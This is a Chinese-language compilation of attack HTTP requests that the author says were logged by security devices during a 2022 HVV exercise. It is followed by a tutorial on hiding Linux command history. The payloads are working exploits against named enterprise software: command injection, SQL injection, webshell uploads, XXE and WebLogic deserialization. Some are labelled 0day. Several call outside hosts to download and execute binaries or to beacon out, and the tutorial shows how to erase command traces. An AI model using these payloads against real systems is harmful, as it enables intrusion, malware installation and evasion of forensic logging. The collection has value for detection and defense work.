2022年的HVV期间抓到的一部分payload

以下所有内容都是在各种安全设备的后台记录到的数据包（不含敏感信息，实际也是攻击失败的），后面的部分留空表示会继续更新 （也可能不会再更新）

=============================================================

蓝凌前台代码执行漏洞，该漏洞是未公开漏洞(S3100028163)

POST /data/sys-common/treexml.tmpl HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE) 

Host:vpn.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:168 

s_bean=ruleFormulaValidate&script=try {String cmd = "ping www.baidu.com";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}

=============================================================

FastJson 漏洞利用

POST / HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0) 

Host:test.dongfeng-nissan.com.cn 

Content-Type:application/json; charset=utf-8 

Content-Length:115 

{

   "@type":"org.apache.shiro.jndi.JndiObjectFactory",

   "resourceName":"rmi://qNWA2Gls.dflqxk.ceye.io/Exploit"

}

===============================================================

fastjson(S2019010052)

POST / HTTP/1.1 

User-Agent:Mozilla/5.0 (Windows NT 6.1; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:test.dongfeng-nissan.com.cn 

Content-Type:application/json; charset=utf-8 

Content-Length:258 

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://5ltnibIi.dflqxk.ceye.io/Exploit",

        "autoCommit":true

    }

}

==============================================================

亿邮eyou 远程代码执行(S3000009837)

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 

Host:test.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:25 

type='|cat /etc/passwd||'

==============================================================

齐治堡垒机SQL注入漏洞

GET /audit/gui_detail_view.php?token=1&id=\&uid=,chr(97)) or 1: print chr(121)+chr(101)+chr(115)

#&login=shterm HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:test.dongfeng-nissan.com.cn 

Content-Length:0

==============================================================

泛微OA E-cology 文件上传 (/page/exportImport/uploadOperation.jsp)(S3100023488)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0) 

Host:test.dongfeng-nissan.com.cn 

Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed 

Content-Length:288 

--b0d829daa06c13d6b3e16b0ad21d1eed

Content-Disposition: form-data; name="file"; filename="pwue.jsp"

Content-Type: application/octet-stream

<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

--b0d829daa06c13d6b3e16b0ad21d1eed--

==============================================================

泛微OA9 前台任意文件上传(S3000009793)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0) 

Host:test.dongfeng-nissan.com.cn 

Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed 

Content-Length:288 

--b0d829daa06c13d6b3e16b0ad21d1eed

Content-Disposition: form-data; name="file"; filename="pwue.jsp"

Content-Type: application/octet-stream

<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

--b0d829daa06c13d6b3e16b0ad21d1eed--

==============================================================

通达OA v11.7 auth_mobi.php任意用户登录漏洞(S3100028588)

GET /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:test.dongfeng-nissan.com.cn 

Content-Length:0 

==============================================================

通达OA文件包含(S2020010015)

POST /ispirit/interface/gateway.php HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:43 

json={"url":"/general/../../mysql5/my.ini"}

==============================================================

通达OA办公系统 report_bi.func.php 文件 dataset_id 参数 SQL注入漏洞(S3100023434)

POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:113 

_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&

==============================================================

ThinkCMF 任意内容包含漏洞(S2020091501)

GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1 

Host:202.96.191.173:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Content-Type:application/json 

Accept-Encoding:gzip 

Connection:close 

==============================================================

用友 GRP-u8 SQL 注入, 可执行命令(S3000009903)

POST /Proxy HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:348 

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

==============================================================

锐捷 EWEB 远程代码执行(S2120090999)

POST /guest_auth/guestIsUp.php HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:63 

mac=1&ip=127.0.0.1|echo 'wkuqchdkhiuasborjbtn' > rqoojwfuwo.txt

==============================================================

Coremail爆出漏洞可以直接读取配置(S2019010019)

GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:preview.dongfeng-nissan.com.cn 

Content-Length:0 

==============================================================

ShopXO 任意文件读取漏洞(CNVD-2021-15822)(S3100024378)

GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE) 

Host:preview.dongfeng-nissan.com.cn 

Content-Length:0 

==============================================================

Zyxel防火墙命令注入漏洞(CVE-2022-30525)(S3100024936)

POST /ztp/cgi-bin/handler HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:vpn.dongfeng-nissan.com.cn 

Content-Type:application/json 

Content-Length:142 

{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl http://Z2i9EVbB.dflqxk.ceye.io;","data":"hi"}

==============================================================

Weblogic漏洞利用或扫描(D11236926c9)

GET /_async/AsyncResponseService HTTP/1.1 

Host:erp-ct.dfsouth.com 

User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 

Accept:*/* 

Connection:keep-alive 

==============================================================

Dynamicweb云电子商务系统未授权添加用户漏洞(CVE-2022-25369)

GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0) 

Host:vpn.dongfeng-nissan.com.cn 

Content-Length:0 

==============================================================

ThinkPHP 5.x 远程代码执行(S2020091901)

GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1 

Host:202.96.191.161:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Accept-Encoding:gzip 

Connection:close 

==============================================================

Apache HTTP Server 远程命令执行(CVE-2021-41773)(S3000010931)

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 

Host:202.96.191.161:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Content-Length:33 

Content-Type:application/x-www-form-urlencoded 

Accept-Encoding:gzip 

Connection:close 

==============================================================

XML外部实体注入(D111751fdae)

POST /Autodiscover/Autodiscover.xml HTTP/1.1 

Host:58.248.167.75:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Content-Length:314 

Content-Type:application/xml 

Accept-Encoding:gzip 

Connection:close 

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">

<Request>

<EMailAddress>aaaaa</EMailAddress>

<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>

</Request>

</Autodiscover>

==============================================================

WebLogic反序列化远程代码执行漏洞（CVE-2019-2725）(S2020041008)

POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.232:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

cmd:powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe');start %SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe 

Content-Length:206204 

Host:202.96.191.232:7001 

<?xml version="1.0" encoding="utf-8" ?>

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

    xmlns:wsa="http://www.w3.org/2005/08/addressing"

    xmlns:asy="http://www.bea.com/async/AsyncResponseService">

    <soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>

    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

    <class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>

    <array class="byte" length="5010"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void>

--------------------------------------------------------------------------------------------------------

POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.185:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Upgrade-Insecure-Requests:1 

Content-Length:913 

Host:202.96.191.185:7001 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   

<soapenv:Header> 

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

----------------------------------------------------------------------------------

POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.185:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Upgrade-Insecure-Requests:1 

Content-Length:915 

Host:202.96.191.185:7001 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   

<soapenv:Header> 

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe');start %SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

==============================================================

WebLogic 权限绕过(CVE-2020-14883)(S2020102903)

POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 

Host:210.21.81.137:7001 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Connection:close 

Content-Length:157 

Content-Type:application/x-www-form-urlencoded 

Accept-Encoding:gzip 

_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://178.20.40.200/wbw.xml")

==============================================================

WebLogic反序列化远程代码执行漏洞（CVE-2017-10271）(S3000008711)

POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.185:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Upgrade-Insecure-Requests:1 

Content-Length:913 

Host:202.96.191.185:7001 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   

<soapenv:Header> 

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

==============================================================

使用CVE-2021-36260漏洞对海康威视发起攻击尝试(S3000011160)

PUT /SDK/webLanguage HTTP/1.1 

Host:202.96.191.232:81 

User-Agent:Go-http-client/1.1 

Content-Length:102 

Accept:*/* 

Accept-Encoding:gzip, deflate 

Accept-Language:en-US,en;q=0.9,sv;q=0.8 

Content-Type:application/x-www-form-urlencoded; charset=UTF-8 

X-Requested-With:XMLHttpRequest 

<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp/ && cd /var/tmp/ && cd /var/run/)</language>

==============================================================

ThinkPHP 远程代码执行(S2020060403)

GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1 

Connection:Keep-Alive 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://210.21.81.157:8087/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Host:210.21.81.157:8087 

==============================================================

Elasticsearch未授权访问(S3100024705)

GET /_cat/indices?format=json&h=index HTTP/1.1 

Host:202.96.191.232:9200 

Accept:*/* 

Accept-Encoding:gzip, deflate, br 

Connection:keep-alive 

User-Agent:python-httpx/0.21.1 

==============================================================

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API 远程命令执行(S3100024329)

POST /editBlackAndWhiteList HTTP/1.1 

Accept-Encoding:identity 

Content-Length:644 

Accept-Language:en-us 

Host:202.96.191.232:90 

Accept:*/* 

User-Agent:Mozila/5.0 

Connection:close 

Cache-Control:max-age=0 

Content-Type:text/xml 

Authorization:Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0= 

<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>

==============================================================

XXL-JOB未授权远程代码执行漏洞(S3100023062)

POST /run HTTP/1.1 

Host:202.96.191.232:9999 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 

Content-Length:334 

Accept:*/* 

Accept-Language:en-US,en;q=0.5 

Connection:close 

Content-Type:application/json 

Accept-Encoding:gzip 

Connection:close 

{

  "jobId": 1,

  "executorHandler": "demoJobHandler",

  "executorParams": "demoJobHandler",

  "executorBlockStrategy": "COVER_EARLY",

  "executorTimeout": 0,

  "logId": 1,

  "logDateTime": 1586629003729,

  "glueType": "GLUE_SHELL",

  "glueSource": "calc",

  "glueUpdatetime": 1658940033024,

  "broadcastIndex": 0,

  "broadcastTotal": 0

}

==============================================================

中远麒麟 iAudit堡垒机 远程命令执行漏洞(get_luser_by_sshport.php)(S3100023318)

GET /get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20md5(ocuswpeelc);unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/ocuswpeelc.php;&clientport=1 HTTP/1.1 

Host:210.21.81.165 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Accept-Encoding:gzip 

==============================================================

奇安信NS-NGFW网康防火墙前台远程代码执行(S3000009856)

POST /directdata/direct/router HTTP/1.1 

Host:202.96.191.135 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Content-Length:200 

Content-Type:application/x-www-form-urlencoded 

Accept-Encoding:gzip 

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(tcynfdguxq);unlink(__FILE__);?>' >/var/www/html/tcynfdguxq.php"]}],"type":"rpc","tid":17}

==============================================================

Jenkins远程代码执行（CVE-2019-1003000）(S2020070703)

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27sqqx%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 

Host:202.96.191.135 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Accept-Encoding:gzip 

==============================================================

检测到针对用友U8 OA test.jsp的SQL注入漏洞攻击(S3000009930)

GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(204218669)) HTTP/1.1 

Host:202.96.191.135 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Accept-Encoding:gzip 

==============================================================

用友时空KSOA软件前台文件上传漏洞，该漏洞是未公开漏洞(S3100028170)

POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=9693326082.jsp HTTP/1.1 

Host:mam.dongfeng-nissan.com.cn 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 

Content-Length:171 

Accept:*/* 

Connection:close 

<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("OTY5MzMyNjA4Mg=="))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>

==============================================================

用友NC 文件上传漏洞，该漏洞在检测发布时处于0day状态，未找到对应补丁。(S3100029010)

POST /aim/equipmap/accept.jsp HTTP/1.1 

Host:202.96.191.196 

User-Agent:python-requests/2.28.0 

Accept-Encoding:gzip, deflate 

Accept:*/* 

Connection:keep-alive 

Content-Type:multipart/form-data; boundary=---------------------------16314487820932200903769468567 

Content-Length:535 

-----------------------------16314487820932200903769468567

                Content-Disposition: form-data; name="upload"; filename="222222.txt"

                Content-Type: text/plain

                <%out.println("bea86d66a5278f9e6fa1112d2e2fcebf");%>

                -----------------------------16314487820932200903769468567

                Content-Disposition: form-data; name="fname"

                \webapps

c_web
80900fd668c51631353aca37fc1f829.jsp

                -----------------------------16314487820932200903769468567--

==============================================================

泛微E-office do_excel.php任意文件写入漏洞

poc

POST /www/general/charge/charge_list/do_excel.php HTTP/1.1 

Host:xxx.com

User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 

Content-Length:34 

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Content-Type:application/x-www-form-urlencoded 

Referer:http://www.baidu.com/ 

Accept-Encoding:gzip

html=<?php system($_POST[pass]);?>

==============================================================

泛微E-cology文件上传漏洞

影响产品:8.0/9.0  10.47以下和其他版本

利用状态:在野利用

背景描述:泛微E-cology文件上传漏洞。

漏洞详情:先发包上传

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1

Host: target

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843

Accept-Encoding:gzip

Dnt: 1

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site

Te: trailers

Connection: close

Content-Length: 437

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="secId"

Content-Type: text/plain

1

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="Filedata"; filename="log.txt"

success

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="plandetailid"

1

-----------------------------34533880461293314163770424843--

将文件释放至跟网站根路径下 在数据包中将 fileid 替换

POST /OfficeServer HTTP/1.1

Host: target

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843

Accept-Encoding:gzip

Dnt: 1

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site

Te: trailers

Connection: close

Content-Length: 437

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="success"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'1015543'}

-----------------------------34533880461293314163770424843--

==============================================================

(疑似0day)用友NC 6.5文件上传漏洞，该漏洞在检测发布时处于0day状态，未找到对应补丁。(S3100029005)

POST /uapim/upload/grouptemplet?groupid=2&fileType=jsp HTTP/1.1 

Host:202.96.191.196 

User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 

Accept-Encoding:gzip, deflate 

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 

Connection:close 

Content-Type:multipart/form-data; boundary=----WebKitFormBoundarymMgLJdk18SQHBnpj 

Content-Length:304 

------WebKitFormBoundarymMgLJdk18SQHBnpj

Content-Disposition: form-data; name="upload"; filename="whoami.jsp"

Content-Type: application/octet-stream

TEST123

------WebKitFormBoundarymMgLJdk18SQHBnpj

Content-Disposition: form-data; name="submit"

submit

------WebKitFormBoundarymMgLJdk18SQHBnpj--

======================================================

隐藏你的 Linux 的命令行历史

 此文来源：在昨天被百度某大佬面试过程的提问的问题，我之前没有遇到过这种场景所以完全处于懵逼状态，于是后面上网搜索了一下，哇！涨知识了，原来还可以这样的。

正文

------------

如果你是 Linux 命令行的用户，有的时候你可能不希望某些命令记录在你的命令行历史中。原因可能很多，例如，你在公司担任某个职位，你有一些不希望被其它人滥用的特权。亦或者有些特别重要的命令，你不希望在你浏览历史列表时误执行。

然而，有方法可以控制哪些命令进入历史列表，哪些不进入吗？或者换句话说，我们在 Linux 终端中可以开启像浏览器一样的无痕模式吗？答案是肯定的，而且根据你想要的具体目标，有很多实现方法。在这篇文章中，我们将讨论一些行之有效的方法。

注意：文中出现的所有命令都在 Ubuntu 下测试过。

不同的可行方法

前面两种方法已经在之前一篇文章中描述了。如果你已经了解，这部分可以略过。然而，如果你不了解，建议仔细阅读。

1. 在命令前插入空格

是的，没看错。在命令前面插入空格，这条命令会被 shell 忽略，也就意味着它不会出现在历史记录中。但是这种方法有个前提，只有在你的环境变量 HISTCONTROL 设置为 "ignorespace" 或者 "ignoreboth" 才会起作用。在大多数情况下，这个是默认值。

所以，像下面的命令（LCTT 译注：这里[space]表示输入一个空格）：

[space]echo "this is a top secret"

如果你之前执行过如下设置环境变量的命令，那么上述命令不会出现在历史记录中。

export HISTCONTROL = ignorespace

下面的截图是这种方式的一个例子。

第四个 "echo" 命令因为前面有空格，它没有被记录到历史中。

2. 禁用当前会话的所有历史记录

如果你想禁用某个会话所有历史，你可以在开始命令行工作前简单地清除环境变量 HISTSIZE 的值即可。执行下面的命令来清除其值：

export HISTSIZE=0

HISTSIZE 表示对于 bash 会话其历史列表中可以保存命令的个数（行数）。默认情况，它设置了一个非零值，例如在我的电脑上，它的值为 1000。

所以上面所提到的命令将其值设置为 0，结果就是直到你关闭终端，没有东西会存储在历史记录中。记住同样你也不能通过按向上的箭头按键或运行 history 命令来看到之前执行的命令。

3. 工作结束后清除整个历史

这可以看作是前一部分所提方案的另外一种实现。唯一的区别是在你完成所有工作之后执行这个命令。下面是刚说到的命令：

history -cw

刚才已经提到，这个和 HISTSIZE 方法有相同效果。

4. 只针对你的工作关闭历史记录

虽然前面描述的方法（2 和 3）可以实现目的，它们可以清除整个历史，在很多情况下，有些可能不是我们所期望的。有时候你可能想保存直到你开始命令行工作之间的历史记录。对于这样的需求，你开始在工作前执行下述命令：

[space]set +o history

备注：[space] 表示空格。并且由于空格的缘故，该命令本身也不会被记录。

上面的命令会临时禁用历史功能，这意味着在这命令之后你执行的所有操作都不会记录到历史中，然而这个命令之前的所有东西都会原样记录在历史列表中。

要重新开启历史功能，执行下面的命令：

[Space]set -o history

它将环境恢复原状，也就是你完成了你的工作，执行上述命令之后的命令都会出现在历史中。

5. 从历史记录中删除指定的命令

